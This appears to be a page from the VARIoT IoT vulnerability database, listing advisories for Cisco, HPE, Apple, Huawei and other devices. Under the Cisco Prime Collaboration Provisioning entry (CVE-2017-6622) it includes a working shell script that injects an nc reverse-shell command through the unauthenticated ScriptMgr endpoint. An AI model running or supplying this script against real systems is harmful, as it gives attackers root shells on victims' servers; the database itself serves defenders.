VARIoT IoT vulnerabilities database
| VAR-201705-4203 | No CVE | Shanghai News Information Remote Command Execution Vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
InforCube Next Generation Firewall (NFW) is an integrated security gateway security solution.
A remote command execution vulnerability exists in Shanghai News's next-generation firewall system. By modifying the POST data sent to install.php, an attacker can write PHP code into a file and then execute that code through the file to obtain a webshell.
| VAR-201705-4200 | No CVE | Buffalo routing product has a universal cookie forgery login vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Buffalo is a router made by an American company.
Buffalo routing products have a universal cookie forgery login vulnerability. An attacker can modify the cookie information to bypass login authentication, log in to the web console, and obtain control of the router.
| VAR-201802-0740 | CVE-2017-8959 | HPE MSA 1040 and MSA 2040 SAN Storage Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
An authentication bypass vulnerability was found in HPE MSA 1040 and HPE MSA 2040 SAN Storage version GL220P008 and earlier. HPE MSA 1040 and MSA 2040 SAN Storage contain vulnerabilities related to authorization, permissions, and access control; information may be obtained or altered, and service operation may be disrupted (DoS). HPE MSA 1040 and MSA 2040 SAN Storage are storage devices from Hewlett Packard Enterprise (HPE). An elevation of privilege vulnerability exists in HPE MSA 1040 and MSA 2040 SAN Storage GL220P008 and earlier; a remote attacker can exploit it to gain elevated privileges.
An attacker may leverage these issues to bypass the authentication mechanism and gain unauthorized access or elevated privileges. This may aid in further attacks.
| VAR-201802-0741 | CVE-2017-8960 | HPE MSA 1040 and MSA 2040 SAN Storage Access control vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An authentication bypass vulnerability was found in HPE MSA 1040 and HPE MSA 2040 SAN Storage version GL220P008 and earlier. HPE MSA 1040 and MSA 2040 SAN Storage contain an access control vulnerability; information may be obtained or altered, and service operation may be disrupted (DoS). HPE MSA 1040 and MSA 2040 SAN Storage are storage devices from Hewlett Packard Enterprise (HPE). An authentication vulnerability exists in HPE MSA 1040 and MSA 2040 SAN Storage GL220P008 and earlier; a remote attacker could exploit it to bypass authentication.
An attacker may leverage these issues to bypass the authentication mechanism and gain unauthorized access or elevated privileges. This may aid in further attacks.
| VAR-201705-3236 | CVE-2017-2522 | Multiple Apple products CoreFoundation component arbitrary code execution vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. tvOS before 10.2.1 is affected. watchOS before 3.2.2 is affected. The issue involves the "CoreFoundation" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted data. Apple iOS, watchOS, macOS and tvOS are prone to a memory corruption vulnerability. Failed exploit attempts may result in a denial-of-service condition.
The issue is fixed in the following releases; versions prior to each of them are affected:
Apple iOS 10.3.2
Apple watchOS 3.2.2
Apple tvOS 10.2.1
Apple macOS 10.12.5
Apple iOS is an operating system developed for mobile devices; watchOS is an operating system for smart watches. CoreFoundation is one of the C language application programming interface (API) components.
| VAR-201802-0717 | CVE-2017-8979 | HPE Integrated Lights-Out 2 firmware vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Security vulnerabilities in the HPE Integrated Lights-Out 2 (iLO 2) firmware could be exploited remotely to allow authentication bypass, code execution, and denial of service. HPE Integrated Lights-Out 2 (iLO 2) is a set of remote control solutions from Hewlett Packard Enterprise (HPE) in the United States. This solution enables remote monitoring, operation, and maintenance of IT assets such as servers. A security vulnerability exists in HPE iLO 2 version 2.29.
| VAR-201705-4032 | CVE-2017-9024 | Secure Bytes Cisco Configuration Manager bundled with Secure Bytes Secure Cisco Auditor directory traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a directory traversal issue in its TFTP server, allowing attackers to read arbitrary files via ../ sequences in a pathname. An attacker could exploit this vulnerability to read arbitrary files.
| VAR-201705-3667 | CVE-2017-6195 | Ipswitch MOVEit Transfer SQL injection vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Ipswitch MOVEit Transfer (formerly DMZ) allows pre-authentication blind SQL injection. The fixed versions are MOVEit Transfer 2017 9.0.0.201, MOVEit DMZ 8.3.0.30, and MOVEit DMZ 8.2.0.20. Ipswitch MOVEit Transfer (formerly DMZ) contains a SQL injection vulnerability; information may be obtained or altered, and service operation may be disrupted (DoS). Ipswitch MOVEit Transfer (formerly known as DMZ) is an automated file transfer system developed by Ipswitch in the United States. The system supports control, management, and visibility into all business-critical file transfer activities through a single, secure system. A security vulnerability exists in Ipswitch MOVEit Transfer. An attacker could exploit the vulnerability to bypass the protection mechanism.
| VAR-201705-3658 | CVE-2017-6636 | Cisco Prime Collaboration Provisioning Software web interface path traversal vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 11.1) could allow an authenticated, remote attacker to view any file on an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to view any file on the system. Cisco Bug IDs: CSCvc99604. The vendor has confirmed this vulnerability and released it as Bug ID CSCvc99604. Information may be obtained. Authentication is not required to exploit this vulnerability. The specific flaw exists within the service that listens on TCP port 443 by default. Access to the /logs/cupm directory is unrestricted. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Information harvested may aid in launching further attacks. The software provides IP communications services functionality for IP telephony, voicemail, and unified communications environments.
| VAR-201808-0666 | CVE-2017-8990 | HPE Intelligent Management Center Wireless Service Manager software vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A remote code execution vulnerability was identified in HPE Intelligent Management Center (iMC) Wireless Service Manager (WSM) Software earlier than version WSM 7.3 (E0506). This issue was resolved in HPE IMC Wireless Services Manager Software IMC WSM 7.3 E0506P01 or subsequent version. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the strMac parameter provided to the macToByte method. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. The iMC solution provides network-wide visibility for comprehensive management of resources, services and users. Wireless Service Manager (WSM) Software is one of its wireless service management components. The vulnerability stems from the program not verifying the length of user-submitted data, so the amount of data copied can exceed the fixed-length stack-based buffer.
| VAR-201705-3737 | CVE-2017-6622 | Cisco Prime Collaboration Provisioning web interface authentication bypass vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724. Authentication is not required to exploit this vulnerability.The specific flaw exists within the ScriptMgr servlet, which listens on TCP port 443 by default. A crafted request can bypass authentication for this resource. An attacker can leverage this vulnerability to execute arbitrary code under the context of root.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments.
# Usage: ./prime-shell.sh <TARGET-IP> <ATTACKER-IP> <ATTACKER-PORT>
function encode() {
    echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'
}
TARGET=$1
ATTACKER=$2
PORT=$3
BASH=$(encode "/bin/bash")
COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f")
SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});"
curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"
| VAR-201705-3736 | CVE-2017-6621 | Cisco Prime Collaboration Provisioning web interface sensitive data access vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to access sensitive data. The attacker could use this information to conduct additional reconnaissance attacks. The vulnerability is due to insufficient protection of sensitive data when responding to an HTTP request on the web interface. An attacker could exploit the vulnerability by sending a crafted HTTP request to the application to access specific system files. An exploit could allow the attacker to obtain sensitive information about the application, which could include user credentials. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases 10.6 through 11.5. Cisco Bug IDs: CSCvc99626. Authentication is not required to exploit this vulnerability. The specific flaw exists within the logconfigtracer.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose any files accessible to the root user. This may result in further attacks. The software provides IP communications services functionality for IP telephony, voicemail, and unified communications environments.
| VAR-201705-3657 | CVE-2017-6635 | Cisco Prime Collaboration Provisioning Software web interface vulnerability related to authorization, permissions, and access control |
CVSS V2: 6.8 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 12.1) could allow an authenticated, remote attacker to delete any file from an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to delete any file from the system. Cisco Bug IDs: CSCvc99597. The vendor has confirmed this vulnerability and released it as Bug ID CSCvc99597. Information may be tampered with. Authentication is not required to exploit this vulnerability. The specific flaw exists within the licensestatus.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. The software provides IP communications services functionality for IP telephony, voicemail, and unified communications environments.
| VAR-201705-3671 | CVE-2017-6652 | Cisco TelePresence IX5000 Series web framework arbitrary file access vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web framework of the Cisco TelePresence IX5000 Series could allow an unauthenticated, remote attacker to access arbitrary files on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using directory traversal techniques to read files within the Cisco TelePresence IX5000 Series filesystem. This vulnerability affects Cisco TelePresence IX5000 Series devices running software version 8.2.0. Cisco Bug IDs: CSCvc52325. Information harvested may aid in launching further attacks. The solution provides components such as audio and video spaces that give remote participants the effect of a face-to-face virtual meeting room.
| VAR-201705-3659 | CVE-2017-6637 | Cisco Prime Collaboration Provisioning Software web interface path traversal vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 11.1) could allow an authenticated, remote attacker to delete any file from an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to delete any file from the system. Cisco Bug IDs: CSCvc99618. The vendor has confirmed this vulnerability and released it as Bug ID CSCvc99618. Information may be tampered with. Authentication is not required to exploit this vulnerability. The specific flaw exists within the logconfigtracer.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. The software provides IP communications services functionality for IP telephony, voicemail, and unified communications environments.
| VAR-201808-0663 | CVE-2017-8987 | HPE Integrated Lights-Out 3 Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.8 CVSS V3: 8.6 Severity: HIGH |
An unauthenticated remote denial of service vulnerability was identified in HPE Integrated Lights-Out 3 (iLO 3) version v1.88 only. The vulnerability is resolved in iLO3 v1.89 or subsequent versions.
Exploiting this issue allows remote attackers to trigger denial-of-service conditions. HPE Integrated Lights-Out 3 (iLO3) is an embedded server management technology of Hewlett Packard Enterprise (HPE) that uses an integrated remote management port to monitor and maintain the health of the server and to manage the server remotely. The associated HPE security bulletin follows.
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03826en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03826en_us
Version: 1
HPESBHF03826 rev.1 - HPE Integrated Lights-Out 3 (iLO 3) Remote Denial of Service
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
References:
- CVE-2017-8987
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
| VAR-201808-0667 | CVE-2017-8991 | HPE CentralView Fraud Risk Management Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
HPE has identified a cross-site scripting (XSS) vulnerability in HPE CentralView Fraud Risk Management earlier than version CV 6.1. This issue is resolved in HF16 for HPE CV 6.1 or subsequent version.
| VAR-201808-0668 | CVE-2017-8992 | HPE CentralView Fraud Risk Management Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
HPE has identified a remote privilege escalation vulnerability in HPE CentralView Fraud Risk Management earlier than version CV 6.1. This issue is resolved in HF16 for HPE CV 6.1 or subsequent version. HPE CentralView Fraud Risk Management contains vulnerabilities related to authorization, permissions, and access control; information may be obtained or altered, and service operation may be disrupted (DoS).
| VAR-201711-0216 | CVE-2017-2700 | Huawei AC6005 and AC6605 software resource management vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
AC6005 with software V200R006C10 and AC6605 with software V200R006C10 have a DoS vulnerability. An attacker can send malformed packets to the device, causing the device to leak memory and leading to DoS. Huawei AC6005 and AC6605 software contains a resource management vulnerability; service operation may be interrupted (DoS). The AC6005 and AC6605 are box-type wireless access controllers from China's Huawei. The AC6005 is a small box-type wireless access controller for small and medium-sized enterprises. The AC6605 is a box-type wireless access controller for medium and large enterprises. A denial of service vulnerability exists in the V200R006C10 version of Huawei AC6005/AC6605. Multiple Huawei products are prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause denial-of-service conditions. The vulnerability is caused by the program not performing sufficient input validation.
| VAR-201705-3672 | CVE-2017-6653 | Cisco Identity Services Engine GUI TCP throttling process resource management vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the TCP throttling process for the GUI of the Cisco Identity Services Engine (ISE) 2.1(0.474) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device, where the ISE GUI may fail to respond to new or established connection requests. The vulnerability is due to insufficient TCP rate limiting protection on the GUI. An attacker could exploit this vulnerability by sending the affected device a high rate of TCP connections to the GUI. An exploit could allow the attacker to cause the GUI to stop responding while the high rate of connections is in progress. Cisco Bug IDs: CSCvc81803. The vendor has published this vulnerability as Bug ID CSCvc81803. A denial of service (DoS) state may result.
An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies.